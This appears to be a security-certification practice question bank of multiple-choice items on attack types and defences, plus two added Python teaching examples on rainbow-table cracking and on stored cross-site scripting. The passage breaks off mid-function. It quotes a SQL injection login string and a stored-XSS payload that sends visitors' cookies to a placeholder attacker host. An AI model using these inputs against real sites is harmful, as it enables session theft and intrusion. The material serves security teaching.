- 1. John is analyzing strange behavior on computers in his network. He believes there is mal-
- ware on the machines. The symptoms include strange behavior that persists, even if he
- boots the machine to a Linux Live CD. What is the most likely cause?
- A. Ransomware
- B. Boot sector virus
- C. Rootkit
- D. Key logger
- 2. Ahmed is a sales manager with a major insurance company. He has received an email that
- is encouraging him to click on a link and fill out a survey. He is suspicious of the email,
- but it does mention a major insurance association, and that makes him think it might be
- legitimate. Which of the following best describes this attack?
- A. Phishing
- B. Social engineering
- C. Spear phishing
- D. Trojan horse
- 3. You are a security administrator for a medium-sized bank. You have discovered a piece of
- software on your bank’s database server that is not supposed to be there. It appears that
- the software will begin deleting database files if a specific employee is terminated. What
- best describes this?
- A. Worm
- B. Logic bomb
- C. Trojan horse
- D. Rootkit
- 4. You are responsible for incident response at Acme bank. The Acme bank website has been
- attacked. The attacker used the login screen, but rather than enter login credentials, he or
- she entered some odd text: ' or '1' = '1. What is the best description for this attack?
- A. Cross-site scripting
- B. Cross-site request forgery
- C. SQL injection
- D. ARP poisoning
- 5. Juanita is a network administrator for a small accounting firm. The users on her network
- are complaining of slow connectivity. When she examines the firewall logs, she observes a
- large number of half-open connections. What best describes this attack?
- A. DDoS
- B. SYN flood
- C. Buffer overflow
- D. ARP poisoning
- 6. Frank is deeply concerned about attacks to his company’s e-commerce server. He is par
- ticularly worried about cross-site scripting and SQL injection. Which of the following
- would best defend against these two specific attacks?
- A. Encrypted web traffic
- B. Filtering user input
- C. A firewall
- D. An IDS
- 7. You are responsible for network security at Acme Company. Users have been reporting
- that personal data is being stolen when using the wireless network. They all insist they
- only connect to the corporate wireless access point (WAP). However, logs for the WAP
- show that these users have not connected to it. Which of the following could best explain
- this situation?
- A. Session hijacking
- B. Clickjacking
- C. Rogue access point
- D. Bluejacking
- 8. What type of attack depends on the attacker entering JavaScript into a text area that is
- intended for users to enter text that will be viewed by other users?
- A. SQL injection
- B. Clickjacking
- C. Cross-site scripting
- D. Bluejacking
- 9. A sales manager at your company is complaining about slow performance on his com-
- puter. When you thoroughly investigate the issue, you find spyware on his computer. He
- insists that the only thing he has downloaded recently was a freeware stock trading appli-
- cation. What would best explain this situation?
- A. Logic bomb
- B. Trojan horse
- C. Rootkit
- D. Macro virus
- 10. Your company outsourced development of an accounting application to a local program-
- ming firm. After three months of using the product, one of your accountants accidently
- discovers a way to log in and bypass all security and authentication. What best describes
- this?
- A. Logic bomb
- B. Trojan horse
- C. Backdoor
- D. Rootkit
- 11. Teresa is the security manager for a mid-sized insurance company. She receives a call
- from law enforcement, telling her that some computers on her network participated in a
- massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her
- company would be involved in a cybercrime. What would best explain this scenario?
- A. It is a result of social engineering.
- B. The machines all have backdoors.
- C. The machines are bots.
- D. The machines are infected with crypto-viruses.
- 12. Mike is a network administrator with a small financial services company. He has received
- a popup window that states his files are now encrypted and he must pay .5 bitcoins to get
- them decrypted. He tries to check the files in question, but their extensions have changed,
- and he cannot open them. What best describes this situation?
- A. Mike’s machine has a rootkit.
- B. Mike’s machine has ransomware.
- C. Mike’s machine has a logic bomb.
- D. Mike’s machine has been the target of whaling.
- 13. Terrance is examining logs for the company e-commerce web server. He discovers a num-
- ber of redirects that cannot be explained. After carefully examining the website, he finds
- some attacker performed a watering hole attack by placing JavaScript in the website and is
- redirecting users to a phishing website. Which of the following techniques would be best
- at preventing this in the future?
- A. An SPI firewall
- B. An active IDS/IPS
- C. Checking buffer boundaries
- D. Checking user input
- 14. What type of attack is based on sending more data to a target variable than the data can
- actually hold?
- A. Bluesnarfing
- B. Buffer overflow
- C. Bluejacking
- D. DDoS
- 15. You have been asked to test your company network for security issues. The specific test
- you are conducting involves primarily using automated and semiautomated tools to look
- for known vulnerabilities with the various systems on your network. Which of the follow-
- ing best describes this type of test?
- A. Vulnerability scan
- B. Penetration test
- C. Security audit
- D. Security test
- 16. Jared discovers that attackers have breached his WiFi network. They have gained access
- via the wireless access point (WAP) administrative panel, and have logged on with the
- credentials the WAP shipped with. What best describes this issue?
- A. Default configuration
- B. Race conditions
- C. Failure to patch
- D. Weak encryption
- 17. Joanne is concerned about social engineering. She is particularly concerned that this tech-
- nique could be used by an attacker to obtain information about the network, including
- possibly even passwords. What countermeasure would be most effective in combating
- social engineering?
- A. SPI firewall
- B. An IPS
- C. User training
- D. Strong policies
- 18. You are responsible for incident response at a mid-sized bank. You have discovered that
- someone was able to successfully breach your network and steal data from your database
- server. All servers are configured to forward logs to a central logging server. However,
- when you examine that central log, there are no entries after 2:13 a.m. two days ago. You
- check the servers, and they are sending logs to the right server, but they are not getting
- there. Which of the following would be most likely to explain this?
- A. Your log server has a backdoor.
- B. Your log server has been hit with a buffer overflow attack.
- C. Your switches have been hit with ARP poisoning.
- D. Your IDS is malfunctioning and blocking log transmissions.
- 19. Coleen is the web security administrator for an online auction website. A small number
- of users are complaining that when they visit the website and log in, they are told the ser-
- vice is down and to try again later. Coleen checks and she can visit the site without any
- problem, even from computers outside the network. She also checks the web server log
- and there is no record of those users ever connecting. Which of the following might best
- explain this?
- A. Typosquatting
- B. SQL injection
- C. Cross-site scripting
- D. Cross-site request forgery
- 20. Mahmoud is responsible for managing security at a large university. He has just per-
- formed a threat analysis for the network, and based on past incidents and studies of
- similar networks, he has determined that the most prevalent threat to his network is
- low-skilled attackers who wish to breach the system, simply to prove they can or for
- some low-level crime, such as changing a grade. Which term best describes this type of
- attacker?
- A. Hacktivist
- B. Amateur
- C. Insider
- D. Script kiddie
- 21. Which of the following best describes a collection of computers that have been compro-
- mised and are being controlled from one central point?
- A. Zombienet
- B. Botnet
- C. Nullnet
- D. Attacknet
- 22. John is conducting a penetration test of a client’s network. He is currently gathering infor-
- mation from sources such as archive.org, netcraft.com, social media, and information
- websites. What best describes this stage?
- A. Active reconnaissance
- B. Passive reconnaissance
- C. Initial exploitation
- D. Pivot
- 23. One of the salespeople in your company reports that his computer is behaving sluggishly.
- You check but don’t see any obvious malware. However, in his temp folder you find JPEGs
- that look like screenshots of his desktop. Which of the following is the most likely cause?
- A. He is stealing data from the company.
- B. There is a backdoor on his computer.
- C. There is spyware on his computer.
- D. He needs to update his Windows.
- 24. What type of attack is based on entering fake entries into a target networks domain name
- server?
- A. DNS poisoning
- B. ARP poisoning
- C. Bluesnarfing
- D. Bluejacking
- 25. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the
- test, he has only been given the company name, the domain name for their website, and
- the IP address of their gateway router. What best describes this type of test?
- A. White-box test
- B. External test
- C. Black-box test
- D. Threat test
- 26. You work for a security company that performs penetration testing for clients. You are
- conducting a test of an e-commerce company. You discover that after compromising the
- web server, you can use the web server to launch a second attack into the company’s inter-
- nal network. What best describes this?
- A. Internal attack
- B. White-box testing
- C. Black-box testing
- D. A pivot
- 27. While investigating a malware outbreak on your company network, you discover some-
- thing very odd. There is a file that has the same name as a Windows system DLL, and
- even has the same API interface, but handles input very differently, in a manner to help
- compromise the system, and it appears that applications have been attaching to this file,
- rather than the real system DLL. What best describes this?
- A. Shimming
- B. Trojan horse
- C. Backdoor
- D. Refactoring
- 28. Your company has hired a penetration testing firm to test the network. For the test, you
- have given the company details on operating systems you use, applications you run, and
- network devices. What best describes this type of test?
- A. White-box test
- B. External test
- C. Black-box test
- D. Threat test
- 29. Frank is a network administrator for a small college. He discovers that several machines
- on his network are infected with malware. That malware is sending a flood of packets to
- a target external to the network. What best describes this attack?
- A. SYN flood
- B. DDoS
- C. Botnet
- D. Backdoor
- 30. John is a salesman for an automobile company. He recently downloaded a program
- from an unknown website, and now his client files have their file extensions changed,
- and he cannot open them. He has received a popup window that states his files are now
- encrypted and he must pay .5 bitcoins to get them decrypted. What has happened?
- A. His machine has a rootkit.
- B. His machine has a logic bomb.
- C. His machine has a boot sector virus.
- D. His machine has ransomware.
- 31. When phishing attacks are so focused that they target a specific individual, they are called
- what?
- A. Spear phishing
- B. Targeted phishing
- C. Phishing
- D. Whaling
- 32. You are concerned about a wide range of attacks that could affect your company’s web
- server. You have recently read about an attack wherein the attacker sends more data to the
- target than the target is expecting. If done properly, this could cause the target to crash.
- What would best prevent this type of attack?
- A. An SPI firewall
- B. An active IDS/IPS
- C. Checking buffer boundaries
- D. Checking user input
- 33. You work for a large retail company that processes credit card purchases. You have been
- asked to test your company network for security issues. The specific test you are conduct-
- ing involves primarily checking policies, documentation, and past incident reports. Which
- of the following best describes this type of test?
- A. Vulnerability scan
- B. Penetration test
- C. Security audit
- D. Security test
- 34. Maria is a salesperson with your company. After a recent sales trip, she discovers that
- many of her logins have been compromised. You carefully scan her laptop and cannot find
- any sign of any malware. You do notice that she had recently connected to a public WiFi
- at a coffee shop, and it is only since that connection that she noticed her logins had been
- compromised. What would most likely explain what has occurred?
- A. She connected to a rogue AP.
- B. She downloaded a Trojan horse.
- C. She downloaded spyware.
- D. She is the victim of a buffer overflow attack.
- 35. You are the manager for network operations at your company. One of the accountants
- sees you in the hall and thanks you for your team keeping his antivirus software up to
- date. When you ask him what he means, he mentions that one of your staff, named Mike,
- called him and remotely connected to update the antivirus. You don’t have an employee
- named Mike. What has occurred?
- A. IP spoofing
- B. MAC spoofing
- C. Man-in-the-middle attack
- D. Social engineering
- 36. You are a security administrator for a bank. You are very interested in detecting any
- breaches or even attempted breaches of your network, including those from internal per-
- sonnel. But you don’t want false positives to disrupt work. Which of the following devices
- would be the best choice in this scenario?
- A. IPS
- B. WAF
- C. SIEM
- D. IDS
- 37. One of your users cannot recall the password for their laptop. You want to recover that
- password for them. You intend to use a tool/technique that is popular with hackers, and
- it consists of searching tables of precomputed hashes to recover the password. What best
- describes this?
- A. Rainbow table
- B. Backdoor
- C. Social engineering
- D. Dictionary attack
- 38. You have noticed that when in a crowded area, you sometimes get a stream of unwanted
- text messages. The messages end when you leave the area. What describes this attack?
- A. Bluejacking
- B. Bluesnarfing
- C. Evil twin
- D. Rogue access point
- 39. Someone has been rummaging through your company’s trash bins seeking to find docu-
- ments, diagrams, or other sensitive information that has been thrown out. What is this
- called?
- A. Dumpster diving
- B. Trash diving
- C. Social engineering
- D. Trash engineering
- 40. You have noticed that when in a crowded area, data from your cell phone is stolen. Later
- investigation shows a Bluetooth connection to your phone, one that you cannot explain.
- What describes this attack?
- A. Bluejacking
- B. Bluesnarfing
- C. Evil twin
- D. RAT
- 41. Louis is investigating a malware incident on one of the computers on his network. He
- has discovered unknown software that seems to be opening a port, allowing someone to
- remotely connect to the computer. This software seems to have been installed at the same
- time as a small shareware application. Which of the following best describes this malware?
- A. RAT
- B. Backdoor
- C. Logic bomb
- D. Rootkit
- 42. This is a common security issue that is extremely hard to control in large environments.
- It occurs when a user has more computer rights, permissions, and privileges than what is
- required for the tasks the user needs to perform. What best describes this scenario?
- A. Excessive rights
- B. Excessive access
- C. Excessive permissions
- D. Excessive privileges
- 43. Jared is responsible for network security at his company. He has discovered behavior on
- one computer that certainly appears to be a virus. He has even identified a file he thinks
- might be the virus. However, using three separate antivirus programs, he finds that none
- can detect the file. Which of the following is most likely to be occurring?
- A. The computer has a RAT.
- B. The computer has a zero-day exploit.
- C. The computer has a logic bomb.
- D. The computer has a rootkit.
- 44. There are some computers on your network that use Windows XP. They have to stay on
- Windows XP due to a specific application they are running. That application won’t run on
- newer operating systems. What security concerns does this situation give you?
- A. No special concerns; this is normal.
- B. The machines cannot be patched; XP is no longer supported.
- C. The machines cannot coordinate with an SIEM since XP won’t support that.
- D. The machines are more vulnerable to DoS attacks.
- 45. Farès has discovered that attackers have breached his wireless network. They seem to have
- used a brute-force attack on the WiFi-protected setup PIN to exploit the WAP and recover
- the WPA2 password. What is this attack called?
- A. Evil twin
- B. Rogue WAP
- C. IV attack
- D. WPS Attack
- 46. Your wireless network has been breached. It appears the attacker modified a portion of
- data used with the stream cipher and utilized this to expose wirelessly encrypted data.
- What is this attack called?
- A. Evil twin
- B. Rogue WAP
- C. IV attack
- D. WPS Attack
- 47. John is concerned about disgruntled employees stealing company documents and exfiltrat-
- ing them from the network. He is looking for a solution that will detect likely exfiltration
- and block it. What type of system is John looking for?
- A. IPS
- B. SIEM
- C. Honeypot
- D. Firewall
- 48. Some users on your network use Acme Bank for their personal banking. Those users have
- all recently been the victim of an attack, wherein they visited a fake Acme Bank website
- and their logins were compromised. They all visited the bank website from your network,
- and all of them insist they typed in the correct URL. What is the most likely explanation
- for this situation?
- A. Trojan horse
- B. IP spoofing
- C. Clickjacking
- D. DNS poisoning
- 49. Users are complaining that they cannot connect to the wireless network. You discover
- that the WAPs are being subjected to a wireless attack designed to block their WiFi signals.
- Which of the following is the best label for this attack?
- A. IV attack
- B. Jamming
- C. WPS attack
- D. Botnet
- 50. What type of attack involves users clicking on something different on a website than what
- they intended to click on?
- A. Clickjacking
- B. Bluesnarfing
- C. Bluejacking
- D. Evil twin
- 51. What type of attack exploits the trust that a website has for an authenticated user to
- attack that website by spoofing requests from the trusted user?
- A. Cross-site scripting
- B. Cross-site request forgery
- C. Bluejacking
- D. Evil twin
- 52. John is a network administrator for Acme Company. He has discovered that someone
- has registered a domain name that is spelled just one letter different than his company’s
- domain. The website with the misspelled URL is a phishing site. What best describes this
- attack?
- A. Session hijacking
- B. Cross-site request forgery
- C. Typosquatting
- D. Clickjacking
- 53. Frank has discovered that someone was able to get information from his smartphone
- using a Bluetooth connection. The attacker was able to get his contact list and some
- emails he had received. What is this type of attack called?
- A. Bluesnarfing
- B. Session hijacking
- C. Backdoor attack
- D. CSRF
- 54. Juanita is a network administrator for Acme Company. Some users complain that they
- keep getting dropped from the network. When Juanita checks the logs for the wireless
- access point (WAP), she finds that a deauthentication packet has been sent to the WAP
- from the users’ IP addresses. What seems to be happening here?
- A. Problem with users’ WiFi configuration
- B. Disassociation attack
- C. Session hijacking
- D. Backdoor attack
- 55. John has discovered that an attacker is trying to get network passwords by using software
- that attempts a number of passwords from a list of common passwords. What type of
- attack is this?
- A. Dictionary
- B. Rainbow table
- C. Brute force
- D. Session hijacking
- 56. You are a network security administrator for a bank. You discover that an attacker has
- exploited a flaw in OpenSSL and forced some connections to move to a weak cipher suite
- version of TLS, which the attacker could breach. What type of attack was this?
- A. Disassociation attack
- B. Downgrade attack
- C. Session hijacking
- D. Brute force
- 57. When an attacker tries to find an input value that will produce the same hash as a pass-
- word, what type of attack is this?
- A. Rainbow table
- B. Brute force
- C. Session hijacking
- D. Collision attack
- 58. Farès is the network security administrator for a company that creates advanced routers
- and switches. He has discovered that his company’s networks have been subjected to a
- series of advanced attacks over a period of time. What best describes this attack?
- A. DDoS
- B. Brute force
- C. APT
- D. Disassociation attack
- 59. You are responsible for incident response at Acme Company. One of your jobs is to
- attempt to attribute attacks to a specific type of attacker. Which of the following would
- not be one of the attributes you consider in attributing the attack?
- A. Level of sophistication
- B. Resources/funding
- C. Intent/motivation
- D. Amount of data stolen
- 60. John is running an IDS on his network. Users sometimes report that the IDS flags legiti-
- mate traffic as an attack. What describes this?
- A. False positive
- B. False negative
- C. False trigger
- D. False flag
- 61. You are performing a penetration test of your company’s network. As part of the test, you
- will be given a login with minimal access and will attempt to gain administrative access
- with this account. What is this called?
- A. Privilege escalation
- B. Session hijacking
- C. Root grabbing
- D. Climbing
- 62. Mary has discovered that a web application used by her company does not always handle
- multithreading properly, particularly when multiple threads access the same variable.
- This could allow an attacker who discovered this vulnerability to exploit it and crash the
- server. What type of error has Mary discovered?
- A. Buffer overflow
- B. Logic bomb
- C. Race conditions
- D. Improper error handling
- 63. An attacker is trying to get access to your network. He is sending users on your network
- a link to a freeware stock-monitoring program. However, that stock-monitoring program
- has attached to it software that will give the attacker access to any machine that it is
- installed on. What type of attack is this?
- A. Rootkit
- B. Trojan horse
- C. Spyware
- D. Boot sector virus
- 64. Acme Company uses its own internal certificate server for all internal encryption.
- However, their certificate authority only publishes a CRL once per week. Does this
- pose a danger, and if so what?
- A. Yes, this means a revoked certificate could be used for up to seven days.
- B. No, this is standard for all certificate authorities.
- C. Yes, this means it would be easy to fake a certificate.
- D. No, since this is being used only internally.
- 65. When a program has variables, especially arrays, and does not check the boundary values
- before inputting data, what attack is the program vulnerable to?
- A. XSS
- B. CRSF
- C. Buffer overflow
- D. Logic bomb
- 66. Which of the following best describes malware that will execute some malicious activity
- when a particular condition is met (i.e., if condition is met, then execute)?
- A. Boot sector virus
- B. Logic bomb
- C. Buffer overflow
- D. Sparse infector virus
- 67. Gerald is a network administrator for Acme Company. Users are reporting odd behavior
- on their computers. He believes this may be due to malware, but the behavior is different
- on different computers. What might best explain this?
- A. It is not malware, but hardware failure.
- B. It is a boot sector virus.
- C. It is a macro virus.
- D. It is a polymorphic virus.
- 68. Teresa is a security officer at ACME Inc. She has discovered an attack where the attacker
- sent multiple broadcast messages to the network routers, spoofing an IP address of one of
- the network servers. This caused the network to send a flood of packets to that server and
- it is no longer responding. What is this attack called?
- A. Smurf attack
- B. DDoS attack
- C. TCP hijacking attack
- D. TCP SYN flood attack
- 69. Which type of virus is able to alter its own code to avoid being detected by antivirus soft-
- ware?
- A. Boot sector
- B. Hoax
- C. Polymorphic
- D. Stealth
- 70. Gerald is a network administrator for a small financial services company. Users are
- reporting odd behavior that appears to be caused by a virus on their machines. After iso-
- lating the machines that he believes are infected, Gerald analyzes them. He finds that all
- the infected machines received an email purporting to be from accounting, with an Excel
- spreadsheet, and the users opened the spreadsheet. What is the most likely issue on these
- machines?
- A. A macro virus
- B. A boot sector virus
- C. A Trojan horse
- D. A RAT
- 71. Fred is on the incident response team for a major insurance company. His specialty is
- malware analysis. He is studying a file that is suspected of being a virus that infected the
- company network last month. The file seems to intermittently have bursts of malicious
- activity, interspersed with periods of being dormant. What best describes this malware?
- A. A macro virus
- B. A logic bomb
- C. A sparse infector virus
- D. A polymorphic virus
- 72. What is the term used to describe a virus that can infect both program files and boot
- sectors?
- A. Polymorphic
- B. Multipartite
- C. Stealth
- D. Multiple encrypting
- 73. Your company has hired an outside security firm to perform various tests of your net-
- work. During the vulnerability scan you will provide that company with logins for vari-
- ous systems (i.e., database server, application server, web server, etc.) to aid in their scan.
- What best describes this?
- A. A white-box test
- B. A gray-box test
- C. A privileged scan
- D. An authenticated user scan
- 74. Which of the following is commonly used in a distributed denial of service (DDoS) attack?
- A. Phishing
- B. Adware
- C. Botnet
- D. Trojan
- 75. You are investigating a recent breach at Acme Company. You discover that the attacker
- used an old account of someone no longer at the company. The account was still active.
- Which of the following best describes what caused this vulnerability to exist?
- A. Improperly configured accounts
- B. Untrained users
- C. Using default configuration
- D. Failure to patch systems
- 76. Juan is responsible for incident response at a large financial institution. He discovers that
- the company WiFi has been breached. The attacker used the same login credentials that
- ship with the wireless access point (WAP). The attacker was able to use those credentials
- 21
- to access the WAP administrative console and make changes. Which of the following best
- describes what caused this vulnerability to exist?
- A. Improperly configured accounts
- B. Untrained users
- C. Using default configuration
- D. Failure to patch systems
- 77. Elizabeth is investigating a network breach at her company. She discovers a program that
- was able to execute code within the address space of another process by using the target
- process to load a specific library. What best describes this attack?
- A. Logic bomb
- B. Session hijacking
- C. Buffer overflow
- D. DLL injection
- 78. Zackary is a malware investigator with a cybersecurity firm. He is investigating malware
- that is able to compromise a target program by finding null references in the target pro-
- gram and dereferencing them, causing an exception to be generated. What best describes
- this type of attack?
- A. DLL injection
- B. Buffer overflow
- C. Memory leak
- D. Pointer dereference
- 79. Frank has just taken over as CIO of a mid-sized insurance company. One of the first
- things he does is order a thorough inventory of all network equipment. He discovers two
- routers that are not documented. He is concerned that if they are not documented, they
- might not be securely configured, tested, and safe. What best describes this situation?
- A. Poor user training
- B. System sprawl
- C. Failure to patch systems
- D. Default configuration
- 80. What is the primary difference between an intrusive and a nonintrusive vulnerability
- scan?
- A. An intrusive scan is a penetration test.
- B. A nonintrusive scan is just a document check.
- C. An intrusive scan could potentially disrupt operations.
- D. A nonintrusive scan won’t find most vulnerabilities.
- 81. Daryl is investigating a recent breach of his company’s web server. The attacker used
- sophisticated techniques and then defaced the website, leaving messages that were
- denouncing the company’s public policies. He and his team are trying to determine the
- type of actor who most likely committed the breach. Based on the information provided,
- who was the most likely threat actor?
- A. A script
- B. A nation-state
- C. Organized crime
- D. Hacktivists
- 82. When investigating breaches and attempting to attribute them to specific threat actors,
- which of the following is not one of the indicators of an APT?
- A. Long-term access to the target
- B. Sophisticated attacks
- C. The attack comes from a foreign IP address.
- D. The attack is sustained over time.
- 83. What type of attack uses a second wireless access point (WAP) that broadcasts the same
- SSID as a legitimate access point, in an attempt to get users to connect to the attacker’s
- WAP?
- A. Evil twin
- B. IP spoofing
- C. Trojan horse
- D. MAC spoofing
- 84. You are investigating a breach of a large technical company. You discover that there have
- been several different attacks over a period of a year. The attacks were sustained, each
- lasting several weeks of continuous attack. The attacks were somewhat sophisticated and
- originated from a variety of IP addresses, but all the IP addresses are within your country.
- Which threat actor would you most suspect of being involved in this attack?
- A. Nation-state
- B. Hacktivist
- C. Script kiddie
- D. A lone highly skilled hacker
- 85. Which of the following best describes a zero-day vulnerability?
- A. A vulnerability that has been known to the vendor for zero days
- B. A vulnerability that has not yet been breached
- C. A vulnerability that can be quickly exploited (i.e., in zero days)
- D. A vulnerability that will give the attacker brief access (i.e., zero days)
- 86. You have discovered that there are entries in your network’s domain name server that
- point legitimate domains to unknown and potentially harmful IP addresses. What best
- describes this type of attack?
- A. A backdoor
- B. An APT
- C. DNS poisoning
- D. A Trojan horse
- 87. What best describes an attack that attaches some malware to a legitimate program so that
- when the user installs the legitimate program, they inadvertently install the malware?
- A. Backdoor
- B. Trojan horse
- C. RAT
- D. Polymorphic virus
- 88. Which of the following best describes software that will provide the attacker with remote
- access to the victim’s machine, but that is wrapped with a legitimate program in an
- attempt to trick the victim into installing it?
- A. RAT
- B. Backdoor
- C. Trojan horse
- D. Macro virus
- 89. Which of the following is an attack that seeks to attack a website, based on the website’s
- trust of an authenticated user?
- A. XSS
- B. CSRF
- C. Buffer overflow
- D. RAT
- 90. John is analyzing what he believes is a malware outbreak on his network. Many users
- report their machines are behaving strangely. The anomalous behavior seems to occur
- sporadically and John cannot find a pattern. What is the most likely cause?
- A. APT
- B. Boot sector virus
- C. Sparse infector virus
- D. Key logger
- 91. Farès is the CISO of a bank. He has received an email that is encouraging him to click on
- a link and fill out a survey. Being security conscious, he normally does not click on links.
- However, this email calls him by name and claims to be a follow-up to a recent conference
- he attended. Which of the following best describes this attack?
- A. Clickjacking
- B. Social engineering
- C. Spear phishing
- D. Whaling
- 92. You are responsible for technical support at your company. Users are all complaining of
- very slow Internet connectivity. When you examine the firewall, you find a large num-
- ber of incoming connections that are not completed, all packets coming from a single IP
- address. What best describes this attack?
- A. DDoS
- B. SYN flood
- C. Buffer overflow
- D. ARP poisoning
- 93. An attacker is trying to get malformed queries sent to the backend database to circumvent
- the web page’s security. What type of attack depends on the attacker entering text into
- text boxes on a web page that is not normal text, but rather odd-looking commands that
- are designed to be inserted into database queries?
- A. SQL injection
- B. Clickjacking
- C. Cross-site scripting
- D. Bluejacking
- 94. Tyrell is responsible for selecting cryptographic products for his company. The company
- wants to encrypt the drives of all laptops. The product they have selected uses 128-bit
- AES encryption for full disk encryption, and users select a password to decrypt the drive.
- What, if any, would be the major weakness in this system?
- A. None; this is a good system.
- B. The 128-bit AES key is too short.
- C. The passwords users select are the weak link.
- D. The AES algorithm is the problem; they should use DES.
- 95. Valerie is responsible for security testing applications in her company. She has discovered
- that a web application, under certain conditions, can generate a memory leak. What type
- of attack would this leave the application vulnerable to?
- A. DoS
- B. Backdoor
- C. SQL injection
- D. Buffer overflow
- 96. When a multithreaded application does not properly handle various threads accessing a
- common value, what flaw is this?
- A. Memory leak
- B. Buffer overflow
- C. Integer overflow
- D. Race condition
- 97. Acme Company is using smart cards that use near-field communication (NFC) rather than
- needing to be swiped. This is meant to make physical access to secure areas more secure.
- What vulnerability might this also create?
- A. Tailgating
- B. Eavesdropping
- C. IP spoofing
- D. Race conditions
- 98. John is responsible for physical security at a large manufacturing plant. Employees all use
- a smart card in order to open the front door and enter the facility. Which of the following
- is a common way attackers would circumvent this system?
- A. Phishing
- B. Tailgating
- C. Spoofing the smart card
- D. RFID spoofing
- 99. Which of the following is the term for an attack wherein malware inserts itself as a
- library, such as a DLL, between an application and the real system library the application
- is attempting to communicate with?
- A. Application spoofing
- B. Jamming
- C. Evil twin
- D. Shimming
- 100. You are responsible for incident response at Acme Corporation. You have discovered that
- someone has been able to circumvent the Windows authentication process for a specific
- network application. It appears that the attacker took the stored hash of the password and
- sent it directly to the backend authentication service, bypassing the application. What type
- of attack is this?
- A. Hash spoofing
- B. Evil twin
- C. Shimming
- D. Pass the hash
- 101. A user in your company reports that she received a call from someone claiming to be from
- the company technical support team. The caller stated that there was a virus spreading
- through the company and he needed immediate access to the employee’s computer to stop
- it from being infected. What social-engineering principles did the caller use to try to trick
- the employee?
- A. Urgency and intimidation
- B. Urgency and authority
- C. Authority and trust
- D. Intimidation and authority
- 102. Ahmed has discovered that someone has manipulated tables in one of the company’s
- switches. The manipulation has changed the tables so that data destined for one specific
- MAC address will now be routed elsewhere. What type of attack is this?
- A. ARP poisoning
- B. DNS poisoning
- C. Man-in-the-middle
- D. Backdoor
- 103. You are investigating incidents at Acme Corporation and have discovered malware on sev-
- eral machines. It appears that this malware infects system files in the Windows/System32/
- directory and also affects the boot sector. What type of malware is this?
- A. Multipartite
- B. Boot sector
- C. Macro virus
- D. Polymorphic virus
- 104. What type of attack uses Bluetooth to access the data from a cell phone when in range?
- A. Phonejacking
- B. Bluejacking
- C. Bluesnarfing
- D. Evil twin
- 105. An attacker is using a table of precomputed hashes in order to try to get a Windows pass-
- word. What type of technique is being used?
- A. Dictionary
- B. Brute force
- C. Pass the hash
- D. Rainbow table
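The precomputation that questions 105 and 144 contrast, as an added example that is not part of the question bank: the table is built once from a wordlist and then answers any unsalted hash with a dictionary lookup, which is the property a rainbow table exploits (a real rainbow table compresses the same table with hash/reduce chains; this block keeps the plain lookup). The second half shows why a per-user salt defeats the table: the attacker is pushed back to a per-salt dictionary attack. The wordlist, passwords and hash function (SHA-256) are constructed for the demonstration.

```python
import hashlib
import os

# Constructed wordlist for the demonstration (not data from the page).
WORDLIST = ["password", "letmein", "Summer2019", "qwerty", "correct-horse"]


def unsalted_hash(password):
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt):
    # The salt is stored next to the hash; it is not secret, only unique per user.
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_lookup_table(words):
    """One-time precomputation, hash -> plaintext. The work is done once and
    reused against every unsalted hash that is ever leaked."""
    return {unsalted_hash(w): w for w in words}


def crack_with_table(table, leaked_hash):
    """Constant-time lookup: no hashing at crack time at all."""
    return table.get(leaked_hash)


def crack_salted(words, leaked_hash, salt):
    """With a salt the precomputed table no longer applies; every candidate has to
    be re-hashed for this specific salt (an ordinary dictionary attack)."""
    for w in words:
        if salted_hash(w, salt) == leaked_hash:
            return w
    return None


if __name__ == "__main__":
    table = build_lookup_table(WORDLIST)
    print(crack_with_table(table, unsalted_hash("letmein")))       # found by lookup
    salt = os.urandom(16)
    leaked = salted_hash("letmein", salt)
    print(crack_with_table(table, leaked))                         # None: table useless
    print(crack_salted(WORDLIST, leaked, salt))                    # found, but only after per-salt work
```

The salt does not make a weak password strong (question 94): `crack_salted` still finds `letmein`. It only removes the reuse of precomputed work across users and across breaches; a slow, memory-hard password hash is what makes the per-salt attack expensive.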
- 106. Carlos works in incident response for a mid-sized bank. Users inform him that internal
- network connections are fine, but connecting to the outside world is very slow. Carlos
- reviews logs on the external firewall and discovers tens of thousands of ICMP packets
- coming from a wide range of different IP addresses. What type of attack is occurring?
- A. Smurf
- B. DoS
- C. DDoS
- D. SYN flood
- 107. What type of attack is it when the attacker attempts to get the victim’s communication to
- abandon a high-quality/secure mode in favor of a lower-quality/less secure mode?
- A. Downgrade
- B. Brute force
- C. Rainbow table
- D. Bluesnarfing
- 108. What type of penetration test is being done when the tester is given extensive knowledge
- of the target network?
- A. White-box
- B. Full disclosure
- C. Black-box
- D. Red team
- 109. Your company is instituting a new security awareness program. You are responsible for
- educating end users on a variety of threats, including social engineering. Which of the fol-
- lowing best defines social engineering?
- A. Illegal copying of software
- B. Gathering information from discarded manuals and printouts
- C. Using people skills to obtain proprietary information
- D. Phishing emails
- 110. Which of the following attacks can be caused by a user being unaware of their physical
- surroundings?
- A. ARP poisoning
- B. Phishing
- C. Shoulder surfing
- D. Smurf attack
- 111. Francine is a network administrator for Acme Corporation. She has noticed that one of
- the servers is now unreachable. After carefully reviewing various logs, she discovers that a
- large number of broadcast packets were sent to the network router, spoofing the server’s IP
- address. What type of attack is this?
- A. SYN flood
- B. ICMP flood
- C. Buffer overflow
- D. Smurf attack
- 112. An attacker enters code into a text box on a website. That text box is used for product
- reviews. The attacker wants his code to execute the next time a visitor visits that page.
- What is this attack called?
- A. SQL injection
- B. Logic bomb
- C. Cross-site scripting
- D. Session hijacking
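The stored cross-site scripting scenario of question 112, as an added example that is not part of the question bank: the first renderer writes each saved review into the page unchanged, so the script the attacker typed into the review box runs in the browser of every later visitor; the second applies output encoding and the same text is displayed as a review. The reviews and the hostname `attacker.example` are constructed for the demonstration.

```python
import html

# Constructed product reviews for the demonstration (not data from the page).
# The second entry is what the attacker submits through the review text box;
# attacker.example is a placeholder hostname.
REVIEWS = [
    "Great product, would buy again.",
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>',
]


def render_vulnerable(reviews):
    """Stored XSS: user text is interpolated into the markup as-is, so the
    browser of every subsequent visitor parses and executes the saved script."""
    return "\n".join(f"<li>{r}</li>" for r in reviews)


def render_safe(reviews):
    """Output encoding: <, >, &, and quotes become entities, so the same text is
    shown as a review rather than parsed as a tag."""
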